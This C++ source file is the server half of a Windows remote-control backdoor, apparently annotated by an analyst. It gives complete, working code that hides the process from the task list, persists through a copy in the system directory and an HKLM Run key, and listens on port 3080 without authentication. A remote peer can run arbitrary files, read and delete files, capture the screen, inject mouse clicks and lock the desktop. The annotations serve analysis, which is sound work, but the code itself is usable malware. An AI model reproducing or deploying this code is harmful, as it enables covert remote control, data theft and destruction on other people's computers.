// zserver.cpp : Defines the entry point for the application.
//
// Analyst summary (everything below is read directly from this file):
//   * Server half of a remote-control tool for Windows. It listens on TCP
//     port 3080 on all interfaces and serves one command per connection.
//   * Connection gate: the peer sends 8 bytes that must compare equal to the
//     fixed string "zserve"; the same 8 bytes are echoed back. The marker is
//     a constant, not a credential, and the traffic is cleartext.
//   * Command frame: 300 bytes; byte 0 is the opcode, bytes 2..299 carry the
//     argument (path or text). Opcodes: 127 test, 1 drive list, 2 directory
//     list, 3 screenshot, 4 mouse input, 5 run file, 6 read file, 7 lock,
//     8 unlock, 9 draw text, 10 delete file, 11 exit.
//   * Host artefacts: a copy of the executable named serveZ.exe in the
//     directory returned by GetSystemDirectory(); value "Zserve" under
//     HKLM\Software\Microsoft\Windows\CurrentVersion\Run; a run-time lookup
//     of RegisterServiceProcess in KERNEL32.DLL.
//   * Return values of recv()/send()/fread() are not checked anywhere, and
//     several send() calls pass a length larger than the object being sent.
//
// NOTE(review): the three header names below were lost when the page was
// extracted (the angle-bracket text is missing); they are left as found.
#include
#include
#include

#define SENDBLOCK 4096 // largest block sent per send() when transferring (files, screenshots, ...)
///////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////
SOCKET sktClient;   // accepted connection for the command currently being served
SOCKET sktConnect;  // listening socket
BOOL EndProgram; // Exit program if TRUE. Nothing in this file assigns it; exit happens via opcode 11.
UINT nPort; // default port (set to 3080 in WinMain)
struct sockaddr_in sockaddrin; // used for bind() and then overwritten by accept() with the peer address
char chrcommand[2][300]; // the command after splitting: [0][0] = opcode, [1] = argument
char chrReceive[300]; // the raw command as received
UINT AnalyseCommand(); // split the received command
BOOL InitSocket(); // return TRUE if successful
BOOL ConnectSocket(); // create, bind and listen; return TRUE if successful
BOOL AcceptSocket(); // original note said "return 0 if successful", but the definition returns TRUE on success
void ResetAll();
void TestConnect();
void SendDriverInfo();
void listDirectory();
void SendScreen();
void RunFile();
void DownLoadFile();
void LockMachine();
void UnLock();
void Text2Screen();
void DelFile();
void AddToSystem();
void HideProcess();
HANDLE DDB2DIB(HBITMAP bitmap); // make the image device-independent
void MouseEvent();
//////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////
// One directory-listing record; sent to the client as raw struct bytes.
typedef struct _MyFileInfo
{
    BOOL InvaliDir;       // invalid directory
    TCHAR szFileName[128]; // file name
    BOOL IsDirectory;     // is it a directory?
    BOOL Next;            // is there another record after this one?
} MyFileInfo, * PMyFileInfo;

// Screenshot header sent before the image bytes.
typedef struct _MyScreenInfo{
    UINT ScrX;    // width (pixels)
    UINT ScrY;    // height (pixels)
    DWORD dwSize; // image size
} MyScreenInfo, * pMyScreenInfo;

// Mouse request received from the client as raw struct bytes.
typedef struct _MyMouseEvent{
    DWORD dwFlags;     // mouse state
    unsigned long dx;  // screen position x
    unsigned long dy;  // screen position y
    BOOL DoubleClick;  // double click? FALSE -> no, TRUE -> yes
} MyMouseEvent, * pMyMouseEvent;
///////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////
// Entry point: hide, install, open the listener, then serve one command per
// accepted connection until the process exits.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    // TODO: Place code here.
    // Hiding is attempted before AddToSystem() shows its consent dialog.
    HideProcess();
    AddToSystem();
    nPort=3080; // default port
    // initialize socket(ver=1.1)
    if(!InitSocket()) return FALSE;
    if(!ConnectSocket()) return FALSE;
    // wait command
    while(!EndProgram) // EndProgram??
    {
        if(!AcceptSocket())
        {
            // accept() failure or marker mismatch: close both sockets and
            // rebuild the listener.
            ResetAll();
            ConnectSocket();
        }
        else
        {
            // recv's result is not checked: a short or failed read leaves
            // whatever an earlier command put in chrReceive.
            recv(sktClient,chrReceive,300,0);
            AnalyseCommand(); // split the command
            switch((chrcommand[0][0]))
            {
            case 127:
                TestConnect(); // test the connection
                break;
            case 1:
                SendDriverInfo(); // send drive information
                break;
            case 2:
                listDirectory(); // list a directory (the path arrives in chrReceive and, after AnalyseCommand(), sits in chrcommand[1])
                break;
            case 3:
                SendScreen(); // capture the screen
                break;
            case 4:
                MouseEvent(); // mouse event
                break;
            case 5:
                RunFile(); // open a file
                break;
            case 6:
                DownLoadFile();
                break;
            case 7:
                LockMachine();
                break;
            case 8:
                UnLock();
                break;
            case 9:
                Text2Screen();
                break;
            case 10:
                DelFile();
                break;
            case 11:
                exit(0);
                break;
            }
            // The connection is closed after every command.
            closesocket(sktClient);
        }
    }
    return 0;
}
/////////////////////////////////////////////////////////////////////
// Start Winsock, requesting version 1.1. Returns TRUE on success; on failure
// shows a message box ("Cannot initialise WinSocket, please check the TCP/IP
// settings") and returns FALSE.
BOOL InitSocket()
{
    WSADATA lpWSAData;
    if(WSAStartup(MAKEWORD(1,1),&lpWSAData)) // The WSAStartup function returns zero if successful
    {
        MessageBox(GetActiveWindow(), "无法初始化WinSocket,请检查TCP/IP设置", "! WinSocket", MB_OK);
        return FALSE; // fail
    }
    return TRUE;
}
/////////////////////////////////////////////////////////////////////
// Create the listening TCP socket, bind it to INADDR_ANY:nPort and listen with
// a backlog of 1. Returns TRUE on success. Each failure shows a message box:
// "Cannot create SOCKET", "Cannot bind the port, it may already be in use",
// "Please check the network settings".
BOOL ConnectSocket()
{
    // socket create
    sktConnect=socket(AF_INET,SOCK_STREAM,0);
    if(sktConnect==INVALID_SOCKET)
    {
        MessageBox(GetActiveWindow(),"无法创建SOCKET","! WinSocket",MB_OK);
        return FALSE;
    }
    // socket bind
    sockaddrin.sin_addr.s_addr = INADDR_ANY; // every local interface
    sockaddrin.sin_family = AF_INET;
    sockaddrin.sin_port = htons(nPort);
    if(bind(sktConnect,(struct sockaddr far *)&sockaddrin,sizeof(sockaddrin)))
    {
        MessageBox(GetActiveWindow(),"无法绑定端口,可能端口已被占用","! WinSocket",MB_OK);
        return FALSE;
    }
    // socket listen
    if(listen(sktConnect,1))
    {
        MessageBox(GetActiveWindow(),"请检查网络设置","! WinSocket",MB_OK);
        return FALSE;
    }
    return TRUE;
}
/////////////////////////////////////////////////////////////////////
// Accept one connection and run the 8-byte marker exchange. Returns TRUE when
// the marker matches, FALSE when accept() fails (message box "Connection
// failed") or the marker differs. On a mismatch sktClient is left open here;
// the caller's ResetAll() closes it.
BOOL AcceptSocket()
{
    int ilenofsockaddr=sizeof(sockaddrin);
    sktClient=accept(sktConnect,(struct sockaddr far *)&sockaddrin,&ilenofsockaddr);
    if(sktClient==INVALID_SOCKET)
    {
        MessageBox(GetActiveWindow(),"连接失败","! WinSocket",MB_OK);
        return FALSE;
    }
    char cFlag[8];
    // recv's result is not checked and cFlag is not initialised, so strcmp
    // below relies on the peer having sent a NUL within the 8 bytes.
    recv(sktClient,cFlag,8,0); // receive the marker that confirms the peer is this software's client
    if(strcmp(cFlag,"zserve\0"))
    {
        return FALSE;
    }
    send(sktClient ,cFlag,8,0); // send the server-side marker (the same 8 bytes, echoed)
    return TRUE;
}
/////////////////////////////////////////////////////////////////////
// Close both the client socket and the listening socket.
void ResetAll()
{
    closesocket(sktClient);
    closesocket(sktConnect);
}
/////////////////////////////////////////////////////////////////////
// Opcode 127: reply with the literal "连接成功" ("connection succeeded").
// The length argument is 300 although the literal is far shorter, so bytes
// located after the literal in memory are read and transmitted as well.
void TestConnect()
{
    send(sktClient,"连接成功",300,0);
}
/////////////////////////////////////////////////////////////////////
// Split chrReceive into opcode and argument: byte 0 goes to chrcommand[0][0]
// and bytes 2..299 go to chrcommand[1][0..297]; byte 1 is skipped.
// chrcommand[1][298] and [299] are never written, so as a zero-initialised
// global the argument always ends in a NUL. Always returns 0.
UINT AnalyseCommand()
{
    chrcommand[0][0]=chrReceive[0];
    for(int i=2;i<=299;i++)
    {
        chrcommand[1][i-2]=chrReceive[i];
    }
    return 0;
}
/////////////////////////////////////////////////////////////////////
// Opcode 1: probe drives 1..26 with _chdrive() and send the letters of those
// that could be selected, in a fixed 300-byte buffer. Side effect: the
// process's current drive is changed by each successful probe.
void SendDriverInfo()
{
    char chr[300]= " "; // a single space is used to make the string "empty"
    int i=0;
    for(int drive = 1; drive <= 26; drive++ )
    {
        if( !_chdrive( drive ) ) // _chdrive returns 0 when the drive could be selected
        {
            chr[i]=(drive+'A'-1);
            i++;
            continue;
        }
        // i is not advanced here, so this '+' is overwritten by the next
        // drive letter found (or stays as the last character).
        chr[i]='+';
    }
    send(sktClient,chr,300,0);
}
/////////////////////////////////////////////////////////////////////
// Opcode 2: change into the directory named by chrcommand[1] and send one
// _MyFileInfo record per entry, followed by a final record with Next = 0.
// If the directory cannot be entered, a single record with InvaliDir = 1 and
// the name "!*目录无法访问*!" ("directory cannot be accessed") is sent instead.
void listDirectory()
{
    long handle;
    struct _MyFileInfo fileinfo;
    struct _finddata_t findfile;
    fileinfo.InvaliDir =0;
    fileinfo.IsDirectory =0;
    fileinfo.Next =0;
    if(_chdir(chrcommand[1]))
    {
        fileinfo.InvaliDir =1;
        strcpy(fileinfo.szFileName ,"!*目录无法访问*!");
        fileinfo.Next =1;
        fileinfo.IsDirectory =0;
        send(sktClient,(char*)&fileinfo,sizeof(_MyFileInfo),0);
        return;
    }
    // The handle is not checked for failure and is never closed in this function.
    handle = _findfirst("*",&findfile);
    do{
        // Unbounded copy into the 128-element szFileName; nothing here limits
        // the length of findfile.name.
        strcpy(fileinfo.szFileName,findfile.name) ;
        fileinfo.Next =1;
        if(GetFileAttributes(fileinfo.szFileName )&FILE_ATTRIBUTE_DIRECTORY)
        {
            fileinfo.IsDirectory =1;
        }
        else
        {
            fileinfo.IsDirectory =0;
        }
        send(sktClient,(char *)&fileinfo,sizeof(_MyFileInfo),0);
    }while(!_findnext(handle,&findfile));
    // Terminator record: same contents as the last entry but with Next = 0.
    fileinfo.Next =0;
    send(sktClient,(char*)&fileinfo,sizeof(_MyFileInfo),0);
}
// Opcode 3: capture the whole screen, convert it with DDB2DIB() and send it:
// first a _MyScreenInfo header, then SENDBLOCK-sized chunks, each followed by
// a recv() that waits for the client's acknowledgement, then the remainder.
void SendScreen()
{
    _MyScreenInfo ScreenInfo;
    ScreenInfo.ScrX = GetSystemMetrics(SM_CXSCREEN);
    ScreenInfo.ScrY = GetSystemMetrics(SM_CYSCREEN);
    ////////////////////////////////////////////////////
    ////////////////////////////////////////////////////
    ////
    //// This screen-capture method comes from Xingchen 1.0 (sockspy 1.0),
    //// thanks to Xingchen
    ////
    ////////////////////////////////////////////////////
    HDC hdcmy,hbufferdc;
    HBITMAP hBit,hOldBitmap;
    // get the screen HDC
    hdcmy = CreateDC("DISPLAY",NULL,NULL,NULL);
    hbufferdc = CreateCompatibleDC(hdcmy);
    // create a compatible HBITMAP
    hBit = CreateCompatibleBitmap(hdcmy, ScreenInfo.ScrX , ScreenInfo.ScrY );
    // copy the screen into memory
    hOldBitmap = (HBITMAP)SelectObject(hbufferdc, hBit);
    StretchBlt(hbufferdc, 0, 0, ScreenInfo.ScrX, ScreenInfo.ScrY, hdcmy, 0, 0,ScreenInfo.ScrX,ScreenInfo.ScrY, SRCCOPY);
    // get the final screen colours (select the original bitmap back; hBit now holds the capture)
    hBit = (HBITMAP)SelectObject(hbufferdc, hOldBitmap);
    // release memory
    // NOTE(review): both DCs came from CreateDC/CreateCompatibleDC but are
    // handed to ReleaseDC here; confirm whether DeleteDC was intended.
    DeleteObject(hOldBitmap);
    ReleaseDC(NULL,hdcmy);
    ReleaseDC(NULL,hbufferdc);
    HANDLE hDib;
    hDib = DDB2DIB(hBit); // can return NULL; the result is not checked here
    DeleteObject(hBit);
    LPBYTE plmagePoint;
    ScreenInfo.dwSize = GlobalSize(hDib);
    int StopFlag;
    // Length is sizeof(ScreenInfo)+1: one byte past the struct is read and sent.
    send(sktClient,(char*)&ScreenInfo,sizeof(ScreenInfo)+1,0);
    // Length is sizeof(int)+1: recv may write one byte past StopFlag.
    recv(sktClient,(char*)&StopFlag,sizeof(int)+1,0);
    // Send Bit
    plmagePoint = (LPBYTE)hDib; // the handle itself is used as the data pointer
    // The counter is a WORD, which bounds the number of full blocks it can count.
    for(WORD i=0;i<(ScreenInfo.dwSize /SENDBLOCK) ;i++)
    {
        send(sktClient,(char*)plmagePoint,sizeof(BYTE)*SENDBLOCK,0);
        plmagePoint = plmagePoint + SENDBLOCK;
        recv(sktClient,(char*)&StopFlag,sizeof(int)+1,0);
    }
    if (ScreenInfo.dwSize %SENDBLOCK)
    {
        send(sktClient,(char*)plmagePoint,sizeof(BYTE)*ScreenInfo.dwSize%SENDBLOCK,0);
    }
    GlobalFree(hDib);
    return;
}
// Convert a device-dependent bitmap into a device-independent bitmap held in
// one GlobalAlloc block: BITMAPINFOHEADER, colour table, then the pixel bits.
// Returns the block on success or NULL on any failure; the caller frees it
// with GlobalFree().
HANDLE DDB2DIB( HBITMAP bitmap)
{
    // Define Variable
    BITMAP bm;
    BITMAPINFOHEADER bi;
    LPBITMAPINFOHEADER lpbi;
    DWORD dwLen;
    HANDLE hDib;
    HANDLE handle;
    HDC hdc;
    HPALETTE hPal;
    hPal = (HPALETTE) GetStockObject(DEFAULT_PALETTE );
    // get bitmap information
    GetObject(bitmap,sizeof(bm),(LPSTR)&bm);
    // initialize the bitmapinfoheader
    bi.biSize = sizeof(BITMAPINFOHEADER);
    bi.biWidth = bm.bmWidth;
    bi.biHeight = bm.bmHeight;
    bi.biPlanes = 1;
    bi.biBitCount = bm.bmPlanes * bm.bmBitsPixel;
    bi.biBitCount = 4; // overrides the line above: output is always 4 bits per pixel
    bi.biCompression = BI_RGB;
    bi.biSizeImage = 0;
    bi.biXPelsPerMeter = 0;
    bi.biYPelsPerMeter = 0;
    bi.biClrUsed = 0;
    bi.biClrImportant = 0;
    // compute the size of the infoheader and the color table
    int ncolors = (1 << bi.biBitCount); // 16 with the forced bit count of 4
    if( ncolors> 256 )
        ncolors = 0;
    dwLen = bi.biSize + ncolors * sizeof(RGBQUAD);
    // we need a device context to get the dib from
    hdc = GetDC(NULL);
    hPal = SelectPalette(hdc,hPal,FALSE); // hPal now holds the previous palette
    RealizePalette(hdc);
    // allocate enough memory to hold bitmapinfoheader and color table
    hDib = GlobalAlloc(GMEM_FIXED,dwLen);
    if (!hDib){
        SelectPalette(hdc,hPal,FALSE);
        ReleaseDC(NULL,hdc);
        return NULL;
    }
    lpbi = (LPBITMAPINFOHEADER)hDib;
    *lpbi = bi;
    // call getdibits with a NULL lpbits param, so the device driver
    // will calculate the bisizeimage field
    GetDIBits(hdc, bitmap, 0L, (DWORD)bi.biHeight, (LPBYTE)NULL, (LPBITMAPINFO)lpbi, (DWORD)DIB_RGB_COLORS );
    bi = *lpbi;
    // if the driver did not fill in the bisizeimage field, then compute it
    // each scan line of the image is aligned on a dword (32bit) boundary
    if (bi.biSizeImage == 0)
    {
        bi.biSizeImage = ((((bi.biWidth * bi.biBitCount) + 31) & ~31) / 8) * bi.biHeight;
    }
    // realloc the buffer so that it can hold all the bits
    dwLen += bi.biSizeImage;
    if (handle = GlobalReAlloc(hDib, dwLen, GMEM_MOVEABLE))
        hDib = handle;
    else
    {
        GlobalFree(hDib);
        // reselect the original palette
        SelectPalette(hdc,hPal,FALSE);
        ReleaseDC(NULL,hdc);
        return NULL;
    }
    // get the bitmap bits
    lpbi = (LPBITMAPINFOHEADER)hDib;
    // finally get the dib
    BOOL bgotbits = GetDIBits( hdc, bitmap,
        0L,                     // start scan line
        (DWORD)bi.biHeight,     // # of scan lines
        (LPBYTE)lpbi            // address for bitmap bits
        + (bi.biSize + ncolors * sizeof(RGBQUAD)),
        (LPBITMAPINFO)lpbi,     // address of bitmapinfo
        (DWORD)DIB_RGB_COLORS); // use rgb for color table
    if( !bgotbits )
    {
        GlobalFree(hDib);
        SelectPalette(hdc,hPal,FALSE);
        ReleaseDC(NULL,hdc);
        return NULL;
    }
    SelectPalette(hdc,hPal,FALSE);
    ReleaseDC(NULL,hdc);
    return hDib;
}
/////////////////////////////////////////////////////////////////////
// Opcode 4: read a _MyMouseEvent from the client, move the cursor to
// (dx, dy) and synthesise a left or right click; the press/release pair is
// repeated when DoubleClick is TRUE. recv's result is not checked, so on a
// failed read the struct holds uninitialised stack contents.
void MouseEvent()
{
    struct _MyMouseEvent met;
    recv (sktClient,(char*)&met,sizeof(_MyMouseEvent),0);
    SetCursorPos(met.dx,met.dy);
    switch(met.dwFlags )
    {
    case MOUSEEVENTF_LEFTDOWN:
        mouse_event(MOUSEEVENTF_LEFTDOWN ,0,0,0,GetMessageExtraInfo());
        mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,GetMessageExtraInfo());
        if(met.DoubleClick ==TRUE)
        {
            mouse_event(MOUSEEVENTF_LEFTDOWN ,0,0,0,GetMessageExtraInfo());
            mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,GetMessageExtraInfo());
        }
        break;
    case MOUSEEVENTF_RIGHTDOWN:
        mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,GetMessageExtraInfo());
        mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,GetMessageExtraInfo());
        if(met.DoubleClick ==TRUE)
        {
            mouse_event(MOUSEEVENTF_RIGHTDOWN ,0,0,0,GetMessageExtraInfo());
            mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,GetMessageExtraInfo());
        }
        break;
    }
}
//////////////////////////////////////////////////////////////////////////////
// Opcode 5: hand the client-supplied string to ShellExecute with the default
// verb. The remote peer therefore chooses what is opened or executed, under
// the account this process runs as.
void RunFile()
{
    ShellExecute(0,0,chrcommand[1],0,0,SW_SHOWNORMAL);
}
//////////////////////////////////////////////////////////////////////////////
// Opcode 6: read the file named by chrcommand[1] and send it to the client.
// Sequence: a 300-byte status frame ("continue" or "FailOpenFile"), the
// file's _finddata_t record, then SENDBLOCK-sized chunks each followed by a
// recv() for the client's acknowledgement, then the remainder.
void DownLoadFile()
{
    // open the file
    FILE *pFile;
    if((pFile=fopen(chrcommand[1],"rb"))==NULL)
    {
        // Length 300 exceeds the literal, so memory after it is sent too.
        send(sktClient,"FailOpenFile\0",300,0);
        return;
    }
    // open file successful
    send(sktClient,"continue\0",300,0); // same over-long length as above
    _finddata_t pFileInfo;
    _findfirst(chrcommand[1],&pFileInfo); // get file attrib (result not checked, handle never closed)
    // Length is sizeof(_finddata_t)+1: one byte past the struct is read and sent.
    send(sktClient,(char *)&pFileInfo,sizeof(_finddata_t)+1,0); // send file attrib
    BYTE *pBuffer=new BYTE[SENDBLOCK]; // never released in this function
    memset(pBuffer,0,SENDBLOCK);
    int StopFlag;
    // Length is sizeof(int)+1: recv may write one byte past StopFlag.
    recv(sktClient,(char*)&StopFlag,sizeof(int)+1,0);
    // The counter is a WORD, which bounds the number of full blocks it can count.
    for(WORD i=0;i<(pFileInfo.size /SENDBLOCK);i++)
    {
        fread(pBuffer,SENDBLOCK,1,pFile);
        send(sktClient,(char*)pBuffer,SENDBLOCK,0);
        memset(pBuffer,0,SENDBLOCK);
        recv(sktClient,(char*)&StopFlag,sizeof(int)+1,0);
    }
    DWORD w=pFileInfo.size %SENDBLOCK;
    if(w)
    {
        fread(pBuffer,w,1,pFile);
        send(sktClient,(char*)pBuffer,w,0);
    }
    fclose(pFile);
}
////////////////////////////////////////////////////////
// Opcode 7: set SPI_SCREENSAVERRUNNING to 1 and disable the desktop window.
// NOTE(review): on Windows 9x the screensaver-running flag is documented to
// suppress Ctrl+Alt+Del and Alt+Tab - confirm for the target platform.
void LockMachine()
{
    SystemParametersInfo(SPI_SCREENSAVERRUNNING, 1, NULL,0);
    EnableWindow(GetDesktopWindow(),FALSE);
}
////////////////////////////////////////////////////////
// Opcode 8: undo LockMachine() - clear the flag and re-enable the desktop window.
void UnLock()
{
    SystemParametersInfo(SPI_SCREENSAVERRUNNING, 0, NULL,0);
    EnableWindow(GetDesktopWindow(),TRUE);
}
/////////////////////////////////////////////////////////
// Opcode 9: paint a 300x100 black rectangle near the centre of the screen and
// draw the client-supplied text over it. Both GetDC(0) results are used
// inline and never released.
void Text2Screen()
{
    BitBlt(GetDC(0), (GetSystemMetrics(SM_CXSCREEN)/2)-200, GetSystemMetrics(SM_CYSCREEN)/2-100, 300, 100, 0,0,0,BLACKNESS);
    TextOut(GetDC(0), (GetSystemMetrics(SM_CXSCREEN)/2)-170, GetSystemMetrics(SM_CYSCREEN)/2-60, chrcommand[1], strlen(chrcommand[1]));
}
/////////////////////////////////////////////////////////
// Opcode 10: reset the attributes of the client-supplied path to NORMAL
// (which clears read-only/hidden/system) and delete the file.
void DelFile()
{
    SetFileAttributes(chrcommand[1],FILE_ATTRIBUTE_NORMAL);
    DeleteFile(chrcommand[1]);
}
/////////////////////////////////////////////////////////
// Install for persistence: copy the running executable to
// <system directory>\serveZ.exe and register it under the HKLM Run key as
// value "Zserve". If serveZ.exe already exists the function returns at once
// without showing the dialog. Otherwise a Yes/No/Cancel warning is shown:
// Cancel exits the process, No skips installation, Yes installs.
void AddToSystem()
{
    HKEY hKEY;
    char CurrentPath[MAX_PATH];
    char SysPath[MAX_PATH];
    long ret;
    LPSTR FileNewName;
    LPSTR FileCurrentName;
    DWORD type=REG_SZ;
    DWORD size=MAX_PATH;
    LPCTSTR Rgspath="Software\\Microsoft\\Windows\\CurrentVersion\\Run" ;
    // Get System Path
    GetSystemDirectory(SysPath,size);
    GetModuleFileName(NULL,CurrentPath,size);
    // Copy File
    FileCurrentName = CurrentPath;
    // lstrcat appends in place, so FileNewName points at SysPath itself.
    FileNewName = lstrcat(SysPath,"\\serveZ.exe"); // copy to windir\system\serveZ.exe
    struct _finddata_t serveZ;
    if(_findfirst(FileNewName,&serveZ)!=-1) return; // already installed!
    // Dialog text (caption "Warning"): "This program may only be used for
    // lawful purposes! Continuing to run it will place this machine under
    // monitoring! If you do not want that, press Cancel to exit. Pressing Yes
    // copies the program to your machine and runs it automatically at system
    // start. Pressing No runs the program once and leaves nothing behind on
    // your system."
    int ihow=MessageBox(0,"该程序只允许用于合法的用途!\n继续运行该程序将使这台机器处于被监控的状态!\n如果您不想这样,请按“取消”按钮退出。\n按下“是”按钮该程序将被复制到您的机器上,并随系统启动自动运行。\n按下“否”按钮,程序只运行一次,不会在您的系统内留下任何东西。","警告",MB_YESNOCANCEL|MB_ICONWARNING|MB_TOPMOST );
    if(ihow==IDCANCEL)
        exit(0);
    if(ihow==IDNO)
        return; // run once only
    // copy the file (third argument TRUE: fail if the target already exists)
    ret = CopyFile(FileCurrentName,FileNewName,TRUE);
    if (!ret)
    {
        return ;
    }
    // add to the registry
    ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,Rgspath,0,KEY_WRITE, &hKEY);
    if(ret!=ERROR_SUCCESS)
    {
        // hKEY was never initialised on this path, yet it is passed to RegCloseKey.
        RegCloseKey(hKEY);
        return ;
    }
    // Set Key
    // The data length passed is MAX_PATH rather than the string length, so
    // the bytes after the terminator in SysPath are handed to the registry too.
    ret=RegSetValueEx(hKEY,"Zserve",NULL,type,(const unsigned char*)FileNewName,size);
    if(ret!=ERROR_SUCCESS)
    {
        RegCloseKey(hKEY);
        return ;
    }
    RegCloseKey(hKEY);
}
///////////////////////////////////////////////////////////////
// Look up RegisterServiceProcess in KERNEL32.DLL at run time and, if the
// export exists, call it with the current process id and 1. When the export
// is absent the function does nothing.
// NOTE(review): this export exists on Windows 95/98/Me, where registering as
// a service process keeps the process out of the Ctrl+Alt+Del task list -
// confirm for the target platform.
void HideProcess()
{
    HINSTANCE hInst = LoadLibrary("KERNEL32.DLL");
    if(hInst)
    {
        typedef DWORD (WINAPI *MYFUNC)(DWORD,DWORD);
        MYFUNC RegisterServiceProcessFun = NULL;
        RegisterServiceProcessFun = (MYFUNC)GetProcAddress(hInst, "RegisterServiceProcess");
        if(RegisterServiceProcessFun)
        {
            RegisterServiceProcessFun(GetCurrentProcessId(),1);
        }
        FreeLibrary(hInst);
    }
}